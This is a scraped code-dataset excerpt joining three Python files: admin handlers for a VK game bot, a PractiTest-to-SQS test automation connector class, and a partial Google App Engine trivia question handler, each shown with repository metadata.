keyboard=back_to_support_menu_keyboard\n )\n\n\n@bl.private_message(state=UnansweredQuestionsState.ANSWER_QUESTION, text='')\nasync def answer_question(message: Message, text=None):\n if text == '◀☎ Обращения':\n await bot.state_dispenser.delete(message.from_id)\n await show_support_menu(message)\n elif len(text) > 512:\n await message.answer(\n '❗ Длина ответа не должна превышать 512 символов!',\n keyboard=back_to_support_menu_keyboard\n )\n else:\n question = await QuestionModel.get(pk=message.state_peer.payload['question_id'])\n question.answer = text\n question.answered_by = await UserModel.get(vk_id=message.from_id)\n question.answered_at = datetime.now()\n await question.save(update_fields=['answer', 'answered_by_id', 'answered_at'])\n await bot.state_dispenser.delete(message.from_id)\n await message.answer('✔ Ответ успешно отправлен!', keyboard=support_menu_keyboard)\n\n await bot.api.messages.send(\n user_id=(await question.from_user).vk_id,\n random_id=random.randint(1, 2 ** 32),\n message='✨ Пришел ответ от тех.поддержки на ваш вопрос!\\n\\n'\n f'💬 Текст ответа: {text}\\n👔 Отправитель: {await get_clickable_user_name(message.from_id)}'\n )\n\n\n@bl.private_message(payload={'support': 'answered'})\nasync def show_answered_questions(message: Message, questions: list = None, page_number: int = 0):\n text = f'📃 Список закрытых обращений | Страница {page_number + 1}'\n\n if not questions:\n questions = await QuestionModel.exclude(answer=None)\n number_of_questions = len(questions)\n\n if not number_of_questions:\n return await message.answer(\n '😕 Список обращений пуст',\n keyboard=support_menu_keyboard\n )\n\n questions_ids = []\n for q in questions[page_number * 3:page_number * 3 + 3]:\n questions_ids.append(q.pk)\n text += f'\\n\\n🔹 Обращение №{q.pk}\\n' \\\n f'💬 Текст обращения: {q.text}\\n' \\\n f'👤 Отправил: {await get_clickable_user_name((await q.from_user).vk_id)}\\n' \\\n f'👔 Ответил: {await get_clickable_user_name((await q.answered_by).vk_id)}'\n\n kb = generate_choice_keyboard_with_pagination(\n numbers=questions_ids,\n prev_page=(page_number > 0),\n next_page=True if number_of_questions - (page_number * 3 + 3) > 0 else False,\n back_label='◀⁉ Обращения'\n )\n await message.answer(text, keyboard=kb)\n await bot.state_dispenser.set(\n message.from_id,\n AnsweredQuestionsState.SHOW_ANSWERED_QUESTIONS,\n questions=questions,\n number_of_questions=number_of_questions,\n current_page=page_number,\n keyboard=kb\n )\n\n\n@bl.private_message(state=AnsweredQuestionsState.SHOW_ANSWERED_QUESTIONS)\nasync def choose_question_to_get_info(message: Message):\n state_payload = message.state_peer.payload\n if not message.payload:\n return await message.answer(\n message='❗ Некорректный ввод!',\n keyboard=state_payload['keyboard']\n )\n\n choice = json.loads(message.payload)['choice']\n if choice == 'back':\n await bot.state_dispenser.delete(message.from_id)\n await show_support_menu(message)\n elif choice == 'current_page':\n await show_answered_questions(\n message,\n questions=state_payload['questions'],\n page_number=state_payload['current_page']\n )\n elif choice == 'prev_page':\n await show_answered_questions(\n message,\n questions=state_payload['questions'],\n page_number=state_payload['current_page'] - 1\n )\n elif choice == 'next_page':\n await show_answered_questions(\n message,\n questions=state_payload['questions'],\n page_number=state_payload['current_page'] + 1\n )\n else:\n question = await QuestionModel.get(pk=choice)\n\n await message.answer(\n f'📑 Детальная и��формация об обращении №{choice}\\n\\n'\n f'💬 Текст обращения: {question.text}\\n'\n f'👤 Отправил: {await get_clickable_user_name((await question.from_user).vk_id)}\\n'\n f'🕐 Время отправки: {question.created_at.strftime(\"%X %x\")}\\n\\n'\n f'💬 Текст ответа: {question.answer}\\n'\n f'👔 Ответил: {await get_clickable_user_name((await question.answered_by).vk_id)}\\n'\n f'🕗 Время ответа: {question.answered_at.strftime(\"%X %x\")}\\n\\n'\n '❗ Чтобы вернуться назад воспользуйтесь кнопкой',\n keyboard=back_to_questions_list\n )\n\n\n@bl.private_message(payload={'support': 'answered_by_me'})\nasync def show_questions_answered_by_me(message: Message):\n questions = await QuestionModel.filter(\n answer__isnull=False,\n answered_by=await UserModel.get(\n vk_id=message.from_id\n )\n )\n await show_answered_questions(message, questions)\n\n\n@bl.private_message(payload={'admin': 'stats'})\nasync def show_admin_stats(message: Message):\n user = await UserModel.get(vk_id=message.from_id)\n questions = await QuestionModel.filter(answered_by=user.pk).count()\n await message.answer(\n f'📉 Статистика {await get_clickable_user_name(message.from_id)}\\n\\n'\n f'{ADMIN_GRADES[user.status][\"emoji\"]} Админ-статус: {user.status}\\n'\n f'☎ Кол-во ответов на обращения: {questions}\\n',\n keyboard=admin_menu_keyboard\n )\n\n\n@bl.private_message(payload={'admin': 'commands'})\nasync def show_admin_commands_list(message: Message):\n admin = await UserModel.get(vk_id=message.from_id)\n admin_lvl = ADMIN_GRADES[admin.status]['lvl']\n\n text = ''\n for grade in ADMIN_GRADES.values():\n if grade['lvl'] <= admin_lvl:\n for command in grade['commands']:\n text += f'\\n{command}'\n\n await message.answer(\n f'🛠 Список доступных команд\\n{text}' if text else '😕 Для вас нет доступных команд',\n keyboard=admin_menu_keyboard\n )\n\n\n@bl.private_message(text='/setstatus ')\nasync def set_user_status(message: Message, vk_id: str = None, lvl: str = None):\n appointing_admin = await UserModel.get(vk_id=message.from_id)\n if appointing_admin.status == 'Пользователь':\n return await start(message)\n\n appointing_admin_lvl = ADMIN_GRADES[appointing_admin.status]['lvl']\n\n if not vk_id.isdigit() or not lvl.isdigit() or '0' in (vk_id, lvl):\n return await message.answer(\n '❗ Некорректный ввод! ID пользователя и уровень должны быть положительными числами!',\n keyboard=admin_menu_keyboard\n )\n vk_id, lvl = int(vk_id), int(lvl)\n\n if vk_id == message.from_id:\n return await message.answer(\n '❗ Некорректный ввод! Вы не можете изменить свой статус!',\n keyboard=admin_menu_keyboard\n )\n\n try:\n appointee = await UserModel.get(vk_id=vk_id)\n except DoesNotExist:\n return await message.answer('❗ Указанный пользователь не зарегистрирован!')\n appointee_lvl = ADMIN_GRADES.get(appointee.status)\n if appointee_lvl is None:\n appointee_lvl = 0\n\n if appointee_lvl >= appointing_admin_lvl or appointing_admin_lvl <= lvl:\n return await message.answer('❗ У вас недостаточно прав!', keyboard=admin_menu_keyboard)\n\n if appointee_lvl == lvl:\n return await message.answer(\n '❗ Пользователь уже имеет указанный статус!',\n keyboard=admin_menu_keyboard\n )\n\n appointee.status = USER_STATUSES[lvl]\n await appointee.save(update_fields=['status'])\n\n if lvl > 1:\n admin_list.set(vk_id, appointee.status)\n else:\n admin_list.delete(vk_id)\n\n await message.answer(\n f'✔ Вы изменили статус пользователя {await get_clickable_user_name(vk_id)} на «{appointee.status}»!',\n keyboard=admin_menu_keyboard\n )\n\n emoji = '⏫' if appointee_lvl < lvl else '⏬'\n await bot.api.messages.send(\n user_id=vk_id,\n random_id=random.randint(1, 2 ** 32),\n message=f'{emoji} {appointing_admin.status} {await get_clickable_user_name(message.from_id)} '\n f'изменил ваш статус на «{appointee.status}»!'\n )\n\n\n@bl.private_message(text='/givemoney ')\nasync def give_money_to_user(message: Message, vk_id: str = None, money: str = None):\n admin = await UserModel.get(vk_id=message.from_id)\n\n if admin.status == 'Пользователь':\n return await start(message)\n\n if not vk_id.isdigit() or not money.isdigit() or '0' in (vk_id, money):\n return await message.answer(\n '❗ Некорректный ввод! ID пользователя и сумма должны быть положительными числами!',\n keyboard=admin_menu_keyboard\n )\n vk_id, money = int(vk_id), int(money)\n\n try:\n recipient = await UserModel.get(vk_id=vk_id)\n except DoesNotExist:\n return await message.answer('❗ Указанный пользователь не зарегистрирован!')\n\n if admin.status not in ('Гл.Администратор', 'Основатель'):\n return await message.answer(\n '❗ У вас недостаточно прав! Данной командой может воспользоваться только '\n 'пользователь со статусом «Гл.Администратор» или «Основатель»!',\n keyboard=admin_menu_keyboard\n )\n\n recipient.balance += money\n await recipient.save(update_fields=['balance'])\n\n await message.answer(\n f'✔ Баланс пользователя {await get_clickable_user_name(recipient.vk_id)} успешно пополнен на ${money}!',\n keyboard=admin_menu_keyboard\n )\n\n await bot.api.messages.send(\n user_id=vk_id,\n random_id=random.randint(1, 2 ** 32),\n message=f'💸 {admin.status} {await get_clickable_user_name(message.from_id)} '\n f'пополнил ваш баланс на ${money}!'\n )\n\n\n@bl.private_message(text='/setmoney ')\nasync def set_money_for_user(message: Message, vk_id: str = None, money: str = None):\n admin = await UserModel.get(vk_id=message.from_id)\n\n if admin.status == 'Пользователь':\n return await start(message)\n\n if not vk_id.isdigit() or not money.isdigit() or '0' in (vk_id, money):\n return await message.answer(\n '❗ Некорректный ввод! ID пользователя и сумма должны быть положительными числами!',\n keyboard=admin_menu_keyboard\n )\n vk_id, money = int(vk_id), int(money)\n\n try:\n recipient = await UserModel.get(vk_id=vk_id)\n except DoesNotExist:\n return await message.answer('❗ Указанный пользователь не зарегистрирован!')\n\n if admin.status not in ('Гл.Администратор', 'Основатель'):\n return await message.answer(\n '❗ У вас недостаточно прав! Данной командой может воспользоваться только '\n 'пользователь со статусом «Гл.Администратор» или «Основатель»!',\n keyboard=admin_menu_keyboard\n )\n\n recipient.balance = money\n await recipient.save(update_fields=['balance'])\n\n await message.answer(\n f'✔ Баланс пользователя {await get_clickable_user_name(recipient.vk_id)} успешно изменен на ${money}!',\n keyboard=admin_menu_keyboard\n )\n\n await bot.api.messages.send(\n user_id=vk_id,\n random_id=random.randint(1, 2 ** 32),\n message=f'💵 {admin.status} {await get_clickable_user_name(message.from_id)} '\n f'изменил ваш баланс на ${money}!'\n )\n\n\n@bl.private_message(text='/del ')\nasync def del_user_account(message: Message, vk_id: str = None):\n admin = await UserModel.get(vk_id=message.from_id)\n\n if admin.status == 'Пользователь':\n return await start(message)\n\n if not vk_id.isdigit():\n return await message.answer(\n '❗ Некорректный введен ID пользователя!',\n keyboard=admin_menu_keyboard\n )\n vk_id = int(vk_id)\n\n try:\n user = await UserModel.get(vk_id=vk_id)\n except DoesNotExist:\n return await message.answer('❗ Указанный пользователь не зарегистрирован!')\n\n if admin.status != 'Основатель':\n return await message.answer(\n '❗ У вас недостаточно прав! Данной командой может воспользоваться только '\n 'пользователь со статусом «Основатель»!',\n keyboard=admin_menu_keyboard\n )\n\n await user.delete()\n\n await message.answer(\n f'✔ Аккаунт пользователя {await get_clickable_user_name(user.vk_id)} удалён!',\n keyboard=admin_menu_keyboard\n )\n\n await bot.api.messages.send(\n user_id=vk_id,\n random_id=random.randint(1, 2 ** 32),\n message=f'❗❌ {admin.status} {await get_clickable_user_name(message.from_id)} удалил ваш ак��аунт!',\n keyboard=Keyboard()\n )\n ","repo_name":"profatsky/vk-game-bot","sub_path":"src/admin/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":18784,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"30"} +{"seq_id":"73605890963","text":"import datetime\nimport time\nfrom enum import Enum\nimport json\nfrom connector.static.core import static_methods\nfrom connector.static.core.aws_sqs_pusher import SQSPusher\n\n\nclass BasePractiTest:\n WAIT_EXPONENTIAL_MULTIPLIER = 10000\n WAIT_EXPONENTIAL_MAX = 60000\n \"\"\"\n Initializes the BasePractiTest class with various configurations and settings.\n\n :param pt_username: PractiTest username.\n :param pt_token: PractiTest API token.\n :param access_key: AWS access key for the user.\n :param secret_key: AWS secret key for the user.\n :param project_name: Name of the project in PractiTest.\n :param practitest_project_id: ID of the project in PractiTest.\n :param practitest_trigger_filter_id_list: List of filter IDs in PractiTest to trigger tests.\n :param practitest_execute_automated: Flag to determine if automated tests should be executed.\n :param practitest_automation_run_only: Filter tests to be executed by their statuses.\n :param processed_field_id: Field ID for the processed field in PractiTest.\n :param processed_field_value: Value for the processed field in PractiTest.\n :param practitest_automation_trigger: Trigger for automation in PractiTest.\n :param practitest_automation_trigger_value: Value for the automation trigger in PractiTest.\n :param practitest_aws_instance_type: Type of AWS instance to be used.\n :param practitest_debug: Debug flag, when True, the spot will no be terminated.\n :param execution_type: Type of execution to be performed.\n :param sync_exec: Flag to determine if execution should be synchronous.\n :param block: Block parameter (purpose to be defined based on code context).\n :param block_id: ID for the block.\n \"\"\"\n\n def __init__(self, pt_username,\n pt_token,\n access_key,\n secret_key,\n project_name,\n practitest_project_id,\n practitest_trigger_filter_id_list=None,\n practitest_execute_automated=None,\n practitest_automation_run_only=None,\n processed_field_id=None,\n processed_field_value=None,\n practitest_automation_trigger=None,\n practitest_automation_trigger_value=None,\n practitest_aws_instance_type=None,\n practitest_debug=None,\n execution_type=None,\n sync_exec=None,\n block=None,\n block_id=None,\n ):\n self.block = block\n self.block_id = block_id\n # PracitTest fields ID\n self.PRACTITEST_USER_NAME = pt_username\n self.PRACTITEST_API_TOKEN = pt_token\n self.AWS_ACCESS_KEY = access_key\n self.AWS_SECRET_KEY = secret_key\n self.PROJECT_NAME = project_name\n self.PRACTITEST_PROJECT_ID = practitest_project_id\n self.PRACTITEST_TRIGGER_FILTER_ID_LIST = practitest_trigger_filter_id_list\n self.PRACTITEST_EXECUTE_AUTOMATED = practitest_execute_automated\n self.PRACTITEST_AUTOMATION_RUN_ONLY = practitest_automation_run_only\n self.PROCESSED_FIELD_ID = processed_field_id\n self.PROCESSED_FIELD_VALUE = processed_field_value\n self.PRACTITEST_AWS_INSTANCE_TYPE = practitest_aws_instance_type\n self.PRACTITEST_DEBUG = practitest_debug\n self.EXECUTION_TYPE = execution_type\n self.SYNCHRONOUS_EXECUTION = sync_exec\n\n # Trigger fields\n self.PRACTITEST_AUTOMATION_TRIGGER = practitest_automation_trigger\n self.PRACTITEST_AUTOMATION_TRIGGER_VALUE = practitest_automation_trigger_value\n\n # PractiTest API URLs\n self.BASE_URL = \"https://api.practitest.com/api/v2/projects/\" + self.PRACTITEST_PROJECT_ID\n self.RUNS_URI = f'{self.BASE_URL}/runs.json?developer_email={self.PRACTITEST_USER_NAME}&api_token={self.PRACTITEST_API_TOKEN}'\n self.INSTANCE_URI = f'{self.BASE_URL}/instances.json?developer_email={self.PRACTITEST_USER_NAME}&api_token={self.PRACTITEST_API_TOKEN}'\n self.SETS_URI = f'{self.BASE_URL}/sets.json?developer_email={self.PRACTITEST_USER_NAME}&api_token={self.PRACTITEST_API_TOKEN}'\n self.SPECIFIC_SET_URI = f'{self.BASE_URL}/sets/YOUR_SET_ID.json?developer_email={self.PRACTITEST_USER_NAME}&api_token={self.PRACTITEST_API_TOKEN}'\n self.CLONE_TEST_SET = f'{self.BASE_URL}/sets/YOUR_SET_ID/clone.json?developer_email={self.PRACTITEST_USER_NAME}&api_token={self.PRACTITEST_API_TOKEN}'\n self.HEADERS = {\n 'Content-Type': 'application/json',\n 'Connection': 'close'\n }\n\n class TestStatusEnum(Enum):\n def __str__(self):\n return str(self.value)\n\n PASSED = 'PASSED'\n FAILED = 'FAILED'\n BLOCKED = 'BLOCKED'\n NO_RUN = 'NO RUN'\n N_A = 'N/A'\n\n\n def log(self, message):\n \"\"\"\n Logs the provided message, storing it in the DB\n :param message: The message to be logged.\n \"\"\"\n from connector.models import Block, LogEntry # Import the Block and LogEntry models\n import datetime\n\n timestamp = datetime.datetime.now()\n log_with_timestamp = f\"[{timestamp}] {message}\"\n\n if self.block_id:\n block = Block.objects.get(pk=self.block_id) # Fetch the block using block_id\n LogEntry.objects.create(block=block, content=log_with_timestamp, timestamp=timestamp)\n\n\n def get_dict_of_tests_objects(self, filter_test_sets_list):\n \"\"\"\n Fetches a list of tests based on their status from the test set labeled as \"Automation Run Only\"\n and returns this list along with a list of Practitest test objects.\n\n Parameters:\n - filter_test_sets (list): A list of test sets to filter from.\n\n Returns:\n - list: A list of dictionaries where each dictionary represents a test containing:\n - project_name (str): Name of the project.\n - test_id (str): Display ID of the test.\n - test_instance (str): Unique ID representing the test instance.\n - test_name (str): Name of the test.\n - test_set_id (str): Display ID of the test set.\n - test_set_name (str): Name of the test set.\n - project_pt_id (str): Project ID from Practitest.\n - execution_session_id (str): Timestamp indicating the current execution session.\n - automation_run_only (str): Indicates if the test is for automation run only.\n - aws_instance_type (str): Specifies the AWS instance type.\n - debug (bool): Indicates if the test is in debug mode.\n - execution_type (str): Type of execution for the test.\n - sync_exec (bool): Indicates if the execution is synchronous.\n\n - list: A list of Practitest test objects.\n\n Raises:\n - Exception: If there's an error parsing the test set or test attributes.\n\n Notes:\n - If no test set is found under the specified filter, a warning will be logged.\n \"\"\"\n initial_tests_list = [] #Contains all the tests to be executed (pushed to queue)\n if not filter_test_sets_list:\n self.log(f'Warning: No test set found under {self.PRACTITEST_TRIGGER_FILTER_ID_LIST} filter, but should be found')\n return\n\n filter_test_sets_dict = self.convert_test_set_obj_list_to_dict_set_id_as_key(filter_test_sets_list)\n tests = self.get_list_of_tests_by_status(filter_test_sets_dict)\n try:\n for test in tests:\n test_set = filter_test_sets_dict[str(test['attributes']['set-id'])]\n test_set_attributes = test_set['attributes']\n test_set_custom_fields = test_set_attributes['custom-fields']\n test_dict = {}\n test_attributes = test['attributes']\n test_custom_fields = test['attributes']['custom-fields']\n test_dict['project_name'] = self.PROJECT_NAME\n test_dict['test_id'] = str(test_attributes['test-display-id'])\n test_dict['test_instance'] = str(test['id']) #Unique test instance id, reporting back to PractiTest\n test_dict['test_name'] = str(test_attributes['name']).replace(\"'\", \"\").replace('\"', '').replace(',', '')\\\n .replace('(', '').replace(')', '').replace('<', '').replace('>', '').replace('!', '').replace('@', '')\\\n .replace('#', '').replace('*', '')\n test_dict['test_set_id'] = str(test_set_attributes['display-id'])\n test_dict['test_set_name'] = str(test_set_attributes['name'])\n test_dict['project_pt_id'] = str(test_attributes['project-id'])\n test_dict['execution_session_id'] = str(time.time()).replace(\".\",\"\") #Timestamp for current execution, relevant for sync execution\n test_dict['automation_run_only'] = str(test_set_custom_fields[self.PRACTITEST_AUTOMATION_RUN_ONLY])\n test_dict['aws_instance_type'] = str(test_set_custom_fields[self.PRACTITEST_AWS_INSTANCE_TYPE])\n test_dict['debug'] = self.get_prioritized_value(self.PRACTITEST_DEBUG, test_set, test, is_boolean=True)\n test_dict['execution_type'] = str(self.EXECUTION_TYPE)\n test_dict['sync_exec'] = static_methods.try_to_get_from_dict(test_set_custom_fields, self.SYNCHRONOUS_EXECUTION, is_boolean=True)\n initial_tests_list.append(test_dict)\n except:\n self.log(f'Error: failed to parse test set/ test attributes')\n return initial_tests_list, tests\n\n\n def get_prioritized_value(self, dict_value, test_set, test, is_boolean=False):\n \"\"\"\n Retrieve a prioritized value from either 'test', 'testset', or 'default' keys.\n\n This function tries to extract a value based on conditions specified in the input dict_value.\n It first checks the 'test' key, then 'testset', and finally the 'default' key. If none\n of these keys provide a value, an exception is raised.\n\n Parameters:\n - dict_value (dict): Dictionary containing keys ('test', 'testset', 'default') to specify the desired value.\n - test_set (dict): Dictionary containing the attributes of the test set.\n - test (dict): Dictionary containing the attributes of the test.\n - is_boolean: If true, it will convert 'yes'/'no' to 'true'/'false' string\n\n Returns:\n - value: The extracted value based on the conditions in dict_value.\n\n Raises:\n - ValueError: If the desired value cannot be retrieved.\n \"\"\"\n\n test_set_attributes = test_set['attributes']\n test_set_custom_fields = test_set_attributes['custom-fields']\n test_attributes = test['attributes']\n test_custom_fields = test_attributes['custom-fields']\n\n\n # Helper function to extract value based on field name and source data\n def extract_value(field, attributes, custom_fields):\n if '---f-' in field:\n val = custom_fields[field]\n else:\n val = attributes[field]\n\n # Handle boolean conversion\n if is_boolean:\n if val == 'yes':\n return 'true'\n elif val == 'no':\n return 'false'\n return val\n\n try:\n # Check for 'test' key\n if 'test' in dict_value:\n return str(extract_value(dict_value['test'], test_attributes, test_custom_fields))\n except:\n pass\n try:\n # Check for 'testset' key\n if 'testset' in dict_value:\n return str(extract_value(dict_value['testset'], test_set_attributes, test_set_custom_fields))\n except:\n pass\n\n # Check for 'default' key\n if 'default' in dict_value:\n return str(dict_value['default'])\n\n # If none of the above conditions are met, raise an exception\n raise ValueError(\"Could not retrieve the desired field value.\")\n\n\n def get_test_set_property(self, test_set_obj, test_set_property, is_custom_fields):\n \"\"\"\n Retrieves a specified property from a test set object.\n\n :param test_set_obj: The test set object from which the property is to be extracted.\n :param test_set_property: The name of the property to retrieve.\n :param is_custom_fields: Boolean indicating whether the property is within the custom fields.\n :return: The value of the specified property. If the property is not found, logs an error message.\n\n Raises:\n Exception: If there's an issue retrieving the property, an error message is logged.\n \"\"\"\n try:\n if is_custom_fields:\n val = test_set_obj['attributes']['custom-fields'][test_set_property]\n else:\n val = test_set_obj['attributes'][test_set_property]\n if not val:\n self.log(f'Failed to get test set property: \"{is_custom_fields}\", is custom field: \"{str(is_custom_fields)}\"')\n except:\n self.log('Failed to get test set property')\n\n\n def get_list_of_tests_by_status(self, test_set_obj_dict):\n \"\"\"\n Fetches a list of tests based on their status and the Automation Run Only property of the associated test set.\n\n :param test_set_obj_dict: Dictionary of test set objects with set IDs as keys.\n :return: A list of test instances filtered by the Automation Run Only property of their associated test set.\n\n Note:\n The method utilizes pagination to fetch tests in batches. Each batch (or page) consists of up to 100 test instances.\n The function will keep fetching additional pages until a page with fewer than 100 test instances is encountered.\n \"\"\"\n\n test_set_ids_list = list(test_set_obj_dict.keys())\n test_set_ids_list_str = ','.join(test_set_ids_list)\n tests_to_execute = []\n page = 1\n while True:\n url = self.INSTANCE_URI + \"&set-ids=\" + test_set_ids_list_str + \"&page[number]=\" + str(page)\n # For next iteration\n page = page + 1\n response = static_methods.wait_for_request_200('get', url, self.HEADERS, msg_on_retry=f'Bad response for get_list_of_tests_by_status; Going to retry')\n dct_sets = json.loads(response.text)\n if len(dct_sets[\"data\"]) > 0:\n for test_instance in dct_sets[\"data\"]:\n test_instance_atrr = test_instance['attributes']\n # If status is 'ALL', will add the test with any status\n test_set_automation_run_only = test_set_obj_dict[str(test_instance['attributes']['set-id'])]['attributes']['custom-fields'][self.PRACTITEST_AUTOMATION_RUN_ONLY].lower()\n if test_set_automation_run_only == 'all':\n tests_to_execute.append(test_instance)\n # Get only if the test matches to given status\n elif test_instance_atrr['run-status'].lower() == test_set_automation_run_only:\n tests_to_execute.append(test_instance)\n if len(dct_sets[\"data\"]) < 100:\n break #Every page is 100 items, no need to get next page\n return tests_to_execute\n\n def convert_test_set_obj_list_to_dict_set_id_as_key(self, test_sets_list):\n \"\"\"\n Converts a list of test set objects to a dictionary with set IDs as keys.\n :param test_sets_list: List of test sets objects.\n :return: A dictionary with test set IDs as keys and test set objects as values.\n \"\"\"\n test_set_obj_dict = {}\n for test_set in test_sets_list:\n test_set_obj_dict[test_set['id']] = test_set\n return test_set_obj_dict\n\n def get_all_testsets_under_filter_list(self, filter_id:str):\n \"\"\"\n Retrieves all test sets that fall under a given filter.\n :param filter_id: Filter ID\n :return: A list of test sets under the specified filters.\n \"\"\"\n filter_id_list = filter_id.split(',')\n return self.get_all_testsets_under_filter_id_list(filter_id_list)\n\n\n def get_all_testsets_under_filter_id_list(self, filter_id_list):\n \"\"\"\n Retrieves all test sets that fall under a given list of filters.\n :param filter_id_list: List of filter IDs.\n :return: A list of test sets under the specified filters.\n \"\"\"\n testsets_list_of_dict = []\n for filter_id in filter_id_list:\n testsets_list_of_dict = testsets_list_of_dict + self.get_all_testsets_under_specific_filter_id(filter_id)\n return testsets_list_of_dict\n\n def get_all_testsets_under_specific_filter_id(self, filter_id):\n \"\"\"Return all test sets under specific filter id\n :param filter_id: int ot string\n :return: dictionary\n Returns a dictionary containing all test sets associated with a specific filter ID.\n\n :param filter_id: ID of the filter, can be an integer or a string.\n :return: Dictionary containing test set data.\n \"\"\"\n\n url = self.SETS_URI + \"&filter-id=\" + str(filter_id)\n try:\n response = static_methods.wait_for_request_200('get', url, self.HEADERS,\n f'Bad response for get_all_testsets_under_specific_filter_id; Going to retry')\n except Exception as e:\n self.log(f\"Error occurred: {e}\")\n raise Exception\n return static_methods.get_dict_data_if_not_empty(json.loads(response.text))\n\n def get_count_of_test_sets_under_filter(self, filter_id):#TODO add case: return only filters where there something to execute\n \"\"\"\n Calculates the count of test sets under a given filter or list of filters.\n\n :param filter_id: Comma-separated string of filter IDs.\n :return: Total count of test sets under the provided filter(s).\n \"\"\"\n\n filter_id_list = filter_id.split(',')\n count = 0\n for filter_id in filter_id_list:\n count = count + static_methods.safe_len(self.get_all_testsets_under_specific_filter_id(filter_id))\n return count\n\n def is_to_trigger(self):\n \"\"\"\n Determines if there are any test sets under the specified filter ID.\n\n :return: True if there are test sets to be executed, otherwise False.\n \"\"\"\n test_set_count = self.get_count_of_test_sets_under_filter(self.PRACTITEST_TRIGGER_FILTER_ID_LIST)\n if test_set_count > 0:\n self.log(f\"{test_set_count} Testset/s found to execute\")\n return True\n else:\n return False\n\n def push_to_sqs(self, tests_to_execute, debug=True):\n \"\"\"\n Pushes test execution data to an SQS queue or, if in debug mode, writes the data to a JSON file.\n\n :param tests_to_execute: Dictionary containing details of tests to be executed.\n :param debug: Boolean indicating if the method is in debug mode. If True, data is written to a JSON file instead of SQS. Default is True.\n \"\"\"\n if debug:\n timestamp = datetime.datetime.now().strftime('%Y-%m-%d-%H-%M-%S')\n filename = f'{timestamp}_to_execute.json'\n static_methods.write_dict_to_json_file(tests_to_execute, filename)\n self.log(f'JSON file: \"{filename}\" created')\n return\n self.log('Going to push to SQS')\n sqs_pusher = SQSPusher(access_key=self.AWS_ACCESS_KEY, secret_key=self.AWS_SECRET_KEY)\n sqs_pusher.push_to_queue()\n return","repo_name":"Sigalov/Automation-Hub","sub_path":"connector/static/core/base_practitest.py","file_name":"base_practitest.py","file_ext":"py","file_size_in_byte":19636,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"30"} +{"seq_id":"72543866003","text":"#!/usr/bin/env python\r\n#\r\n# Copyright 2007 Google Inc.\r\n#\r\n# Licensed under the Apache License, Version 2.0 (the \"License\");\r\n# you may not use this file except in compliance with the License.\r\n# You may obtain a copy of the License at\r\n#\r\n# http://www.apache.org/licenses/LICENSE-2.0\r\n#\r\n# Unless required by applicable law or agreed to in writing, software\r\n# distributed under the License is distributed on an \"AS IS\" BASIS,\r\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\n# See the License for the specific language governing permissions and\r\n# limitations under the License.\r\n#\r\nimport cgi\r\nimport datetime\r\nimport os\r\nimport lib\r\n#import controller.sessions.SessionManager\r\n#from controller.appengine_utilities.sessions import Session\r\n#from controller.appengine_utilities.flash import Flash\r\n#from controller.appengine_utilities.cache import Cache\r\nfrom google.appengine.api import users\r\nfrom google.appengine.ext import webapp\r\nfrom google.appengine.ext.webapp import util\r\nfrom google.appengine.ext import db\r\nfrom google.appengine.api import datastore_errors\r\nfrom google.appengine.ext.webapp import template\r\nfrom lib import mkhandler\r\nimport string\r\nimport datetime\r\nfrom model.models import *\r\n\r\nclass AddQuestionHandler(mkhandler.MKGAEHandler):\r\n\t\r\n\tdef base_directory(self):\r\n\t\treturn os.path.dirname(__file__)\r\n\t\r\n\tdef get(self, second_argument):\r\n\t\tself.internal_get(second_argument)\r\n\t\r\n\tdef internal_get(self,trivia_code):\r\n\t\tvalues = {\r\n\t\t\t'range3' : range(3),\r\n\t\t\t'trivia_code' : trivia_code,\r\n\t\t}\r\n\t\tself.render('add_trivia_question',template_values=values)\r\n\t\t#self.base_auth()\r\n\t\t#self.get_internal()\r\n\t\t#user_logout = users.create_logout_url(\"/eventos/\")\r\n\t\t#self.response.out.write(\"Logout.\" %user_logout)\r\n\r\n\tdef post(self, second_argument):\r\n\t\tself.auth_check()\r\n\t\tself.internal_post(second_argument)\r\n\t\t\r\n\tdef internal_post(self,trivia_code):\r\n\t\r\n\t\ttrivia = MKTrivia.get_by_id(int(trivia_code))\r\n\t\t\r\n\t\tquestion = MKTriviaQuestion()\r\n\t\tquestion.question_text = self.request.get('question_text')\r\n\t\tquestion.general_feedback = self.request.get('feedback_text')\r\n\t\tquestion.phrase = self.request.get('phrase_text')\r\n\t\tquestion.trivia = trivia\r\n\t\tquestion.last_displayed = datetime.datetime.now()\r\n\t\tquestion.put()\r\n\t\tself.flash = 'Pregunta Agregada'\r\n\t\tfor i in range(3):\r\n\t\t\tpossible_answer = MKTriviaPossibleAnswer()\r\n\t\t\tpossible_answer.possible_answer_text = self.request.get('alternative'+str(i)+'_text')\r\n\t\t\tpossible_answer.feedback_text = self.request.get('feedback'+str(i)+'_text')\r\n\t\t\tpossible_answer.is_correct = self.request.get('correct_alternative'+str(i)) == \"True\"\r\n\t\t\tpossible_answer.question = question\r\n\t\t\tpossible_answer.put()\r\n\t\tvalues = { \r\n\t\t\t\t\t'flash' : self.flash,\r\n\t\t\t\t\t'trivia_code' : trivia_code\r\n\t\t\t\t}\r\n\t\tself.render('added_trivia_question',template_values=values);\r\nclass ListTriviaHandler(mkhandler.MKGAEHandler):\r\n\tdef base_directory(self):\r\n\t\treturn os.path.dirname(__file__)\r\n\t\t\r\n\tdef internal_get(self):\r\n\t\tquestions = MKTriviaQuestion.all()\r\n\t\t\r\n\t\tself.render('trivia_list', template_values={'questions':questions})\r\n\r\nclass AddTriviaHandler(mkhandler.MKGAEHandler):\r\n\t\r\n\tdef base_directory(self):\r\n\t\treturn os.path.dirname(__file__)\r\n\t\r\n\tdef internal_get(self):\r\n\t \r\n\t\tself.render('add_trivia')\r\n\t\t#self.base_auth()\r\n\t\t#self.get_internal()\r\n\t\t#user_logout = users.create_logout_url(\"/eventos/\")\r\n\t\t#self.response.out.write(\"Logout.\" %user_logout)\r\n\r\n\tdef internal_post(self):\r\n\t\t\r\n\t\ttrivia_name = self.request.get('trivia_name')\r\n\t\t\r\n\t\texisting_trivia = MKTrivia.all().filter('trivia_name = ',trivia_name).get()\r\n\t\t\r\n\t\tif existing_trivia:\r\n\t\t\tflash_message = 'La trivia ya existe'\r\n\t\t\tvalues = { 'flash' : flash_message, 'flash_type' : 'error'}\r\n\t\t\tself.render('add_trivia',template_values=values)\r\n\t\t\treturn \r\n\t\t\r\n\t\ttrivia = 